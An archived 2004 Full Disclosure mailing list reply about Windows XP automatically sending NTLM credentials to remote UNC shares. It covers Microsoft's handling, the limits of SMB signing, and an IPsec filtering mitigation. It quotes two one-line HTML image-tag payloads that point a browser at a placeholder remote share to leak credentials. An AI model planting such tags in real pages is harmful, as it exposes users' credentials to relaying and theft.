Full Disclosure mailing list archives
Re[2]: Automatically passing NTLM authentication credentials on Windows XP
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Wed, 29 Sep 2004 10:52:42 +0400
Dear Hidenobu Seki, HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all I have same question. I had discussion on this topic with Microsoft security team again just few weeks ago (and 2 more discussions during last 4 years). They accepted this problem and have re-opened the case (MSRC 5468lw) but gave no timelines for solution. I think MS doesn't understand problem completely. For example, they still believe SMB signing prevents NTLM relaying attacks while SMB signing doesn't prevent even simplest port redirection, because IP address is not signed. Currently there is no way to mitigate this problem except filtering outgoing NetBIOS and CIFS requests by implementing domain wide IP Security policy to allow SMB and CIFS communication only with file servers/domain controllers (if somebody is interested I can publish step-by-step instructions, but I believe MS should publish KB article to describe this configuration). I don't think problem reported by you is different issue, it's just another exploit scenario for the same problem. I know few more tricks to redirect user to UNC share. --Wednesday, September 29, 2004, 5:43:15 AM, you wrote to 3APA3A () SECURITY NNOV RU:
From: 3APA3A <3APA3A () SECURITY NNOV RU> This problem is known since at least 1997 and still can be exploited with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word document.
HS> It is not true. HS> They are different problems that happen the same phenomenon. HS> Mr. Cesar Cerrudo taught me that <img HS> src=file://\\www.xxx.yyy\test> still HS> works. HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all HS> Kind regards, HS> Urity HS> _________________________________________________________________ HS> STOP MORE SPAM with the new MSN 8 and get 2 months FREE* HS> http://join.msn.com/?page=features/junkmail -- ~/ZARAZA Появился новый тип элементарных частиц - шкварки. Не очень большие, слегка подгоревшие. (Лем) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 27)
- Re: Automatically passing NTLM authentication credentials on Windows XP 3APA3A (Sep 28)
- Re: Automatically passing NTLM authentication credentials on Windows XP Barrie Dempster (Sep 28)
- <Possible follow-ups>
- Re: Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 28)
- Re[2]: Automatically passing NTLM authentication credentials on Windows XP 3APA3A (Sep 29)
- Re[2]: Automatically passing NTLM authentication credentials on Windows XP Hidenobu Seki (Sep 29)
- Re: Automatically passing NTLM authentication credentials on Windows XP 3APA3A (Sep 28)